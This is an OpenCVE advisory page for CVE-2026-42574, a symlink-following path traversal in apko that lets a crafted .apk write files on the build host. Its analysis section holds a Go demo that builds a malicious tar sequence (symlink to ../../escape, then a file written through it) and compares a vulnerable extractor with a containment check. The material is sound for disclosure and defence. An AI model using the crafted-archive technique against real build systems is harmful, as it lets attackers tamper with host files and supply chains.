Description
apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5.
Published: 2026-05-09
Score: 7.5 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A crafted .apk archive supplied to apko can contain a TypeSymlink tar entry whose target points outside the image build root. Because the extractor (dirFS) resolved later paths through the on-disk tree, a subsequent directory-creation or file-write entry in the same or a later archive follows that symlink and lands on a host path the build user can write to. The result is the ability to create or overwrite files outside the container image, so a malicious package can tamper with the build host wherever the apko user has write access. The published CVSS vector rates the impact as integrity-only (C:N/I:H/A:N). The weakness is a CWE-22 path traversal reached through CWE-59 improper link resolution (symlink following) rather than through ".." components in the entry names.
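As an added illustration (not apko's code; a constructed sample archive and a toy extractor with hypothetical function names), the Go program below builds the entry sequence the advisory describes, a symlink whose target climbs above the root followed by a directory and a file beneath it, and extracts it twice: once by joining paths lexically and letting the kernel follow whatever symlinks earlier entries created, which writes the file outside the root, and once through a resolver that evaluates the already-existing part of each path and rejects anything that leaves the root.

```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// buildArchive constructs, in memory, the entry sequence the advisory describes:
// a symlink whose target climbs above the build root, then a directory and a
// regular file beneath that symlink. Constructed sample, not a real .apk.
func buildArchive() []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	body := []byte("written through the symlink\n")
	hdrs := []*tar.Header{
		{Name: "usr/", Typeflag: tar.TypeDir, Mode: 0o755},
		// root/usr/lib -> root/usr/../../escape, i.e. <parent of root>/escape
		{Name: "usr/lib", Typeflag: tar.TypeSymlink, Linkname: "../../escape", Mode: 0o777},
		{Name: "usr/lib/sub/", Typeflag: tar.TypeDir, Mode: 0o755},
		{Name: "usr/lib/sub/payload", Typeflag: tar.TypeReg, Mode: 0o644, Size: int64(len(body))},
	}
	for _, h := range hdrs {
		if err := tw.WriteHeader(h); err != nil {
			panic(err)
		}
		if h.Typeflag == tar.TypeReg {
			if _, err := tw.Write(body); err != nil {
				panic(err)
			}
		}
	}
	if err := tw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

// resolveInRoot (hypothetical helper) computes where name would actually land
// on disk: it evaluates symlinks on the longest prefix that already exists,
// appends the remainder, and rejects the result if it is outside root.
func resolveInRoot(root, name string) (string, error) {
	realRoot, err := filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	existing := filepath.Join(realRoot, filepath.Clean("/"+name))
	rest := ""
	for {
		if _, err := os.Lstat(existing); err == nil {
			break
		}
		rest = filepath.Join(filepath.Base(existing), rest)
		existing = filepath.Dir(existing)
	}
	resolved, err := filepath.EvalSymlinks(existing) // a dangling link errors here, which is also a rejection
	if err != nil {
		return "", err
	}
	target := filepath.Join(resolved, rest)
	rel, err := filepath.Rel(realRoot, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("entry %q resolves to %s, outside the build root", name, target)
	}
	return target, nil
}

// extract unpacks archive under root. With followLinks=true the destination is a
// lexical join and the kernel follows whatever symlinks earlier entries created
// (the vulnerable pattern); with followLinks=false every entry goes through resolveInRoot.
func extract(root string, archive []byte, followLinks bool) error {
	tr := tar.NewReader(bytes.NewReader(archive))
	for {
		h, err := tr.Next()
		if err == io.EOF {
			return nil
		}
		if err != nil {
			return err
		}
		dst := filepath.Join(root, filepath.Clean("/"+h.Name)) // stops "../" names, not on-disk links
		if !followLinks {
			if dst, err = resolveInRoot(root, h.Name); err != nil {
				return err
			}
		}
		switch h.Typeflag {
		case tar.TypeDir:
			err = os.MkdirAll(dst, os.FileMode(h.Mode))
		case tar.TypeSymlink:
			err = os.Symlink(h.Linkname, dst)
		case tar.TypeReg:
			var f *os.File
			if f, err = os.OpenFile(dst, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, os.FileMode(h.Mode)); err == nil {
				_, err = io.Copy(f, tr)
				f.Close()
			}
		}
		if err != nil {
			return err
		}
	}
}

// runDemo extracts the sample into a fresh temp tree <base>/root, with a writable
// <base>/escape beside it standing in for a host directory, and reports whether
// <base>/escape/sub/payload was written.
func runDemo(followLinks bool) (escaped bool, err error) {
	base, err := os.MkdirTemp("", "apko-demo-")
	if err != nil {
		return false, err
	}
	defer os.RemoveAll(base)
	root := filepath.Join(base, "root")
	for _, d := range []string{root, filepath.Join(base, "escape")} {
		if err := os.Mkdir(d, 0o755); err != nil {
			return false, err
		}
	}
	err = extract(root, buildArchive(), followLinks)
	_, statErr := os.Stat(filepath.Join(base, "escape", "sub", "payload"))
	return statErr == nil, err
}

func main() {
	for _, follow := range []bool{true, false} {
		escaped, err := runDemo(follow)
		fmt.Printf("followLinks=%v escaped=%v err=%v\n", follow, escaped, err)
	}
}
```

The first pass reports escaped=true with no error; the second returns an error on the directory entry and writes nothing outside the root. The lexical filepath.Clean guard is not enough here because the escape happens on disk, when the kernel follows the symlink an earlier entry created, and the target directory only has to exist and be writable by the build user. This resolver simply refuses any link that leaves the root; an extractor that wants chroot-like semantics would instead reinterpret absolute link targets relative to the root, and Go 1.24's os.Root provides that containment in the standard library.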

Affected Systems

The vulnerability affects chainguard-dev apko from version 0.14.8 up to, but not including, version 1.2.5; the fix shipped in apko v1.2.5. Releases before 0.14.8 are not listed as affected.

Risk and Exploitability

The CVSS 3.1 base score of 7.5 (High) comes from the vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N: network attack vector, low complexity, no privileges or user interaction required, and integrity impact only. The EPSS estimate is below 1% (very low), and the vulnerability is not listed in CISA's KEV catalog. Exploitation requires getting a crafted .apk into an apko build, typically through a package repository or a locally supplied package the pipeline trusts; anyone who can influence which packages a build consumes can then write files on the build host wherever the apko user has write access, compromising build integrity and potentially enabling further compromise of that host.

Generated by OpenCVE AI on May 9, 2026 at 20:50 UTC.

Remediation

The vendor fix is apko v1.2.5; no workaround for earlier versions is documented.

OpenCVE Recommended Actions

  • Upgrade apko to version 1.2.5 or later to apply the vendor fix.
  • Disallow or monitor the use of untrusted .apk packages in the build pipeline.
  • Execute apko builds inside a read‑only or highly restricted sandbox to prevent the build root from modifying host file systems.
  • Restrict file system permissions for the user running apko so that accidental writes outside intended directories are prevented.


Tracking


Advisories
Source: GitHub GHSA
ID: GHSA-qq3r-w4hj-gjp6
Title: apko dirFS has a symlink-following path traversal that allows multiple entry points to escape the build root
History

Sat, 09 May 2026 20:45:00 +0000

Type: First Time appeared
Values added: Chainguard-dev; Chainguard-dev apko

Type: Vendors & Products
Values added: Chainguard-dev; Chainguard-dev apko

Sat, 09 May 2026 19:45:00 +0000

Type: Description
Values added: apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5.

Type: Title
Values added: apko dirFS has a symlink-following path traversal that allows multiple entry points to escape the build root

Type: Weaknesses
Values added: CWE-22; CWE-59

Type: References

Type: Metrics
Values added: cvssV3_1 {'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-09T19:24:48.497Z

Reserved: 2026-04-28T17:26:12.085Z

Link: CVE-2026-42574

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-05-09T20:16:29.420

Modified: 2026-05-09T20:16:29.420

Link: CVE-2026-42574

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-09T21:00:12Z

Weaknesses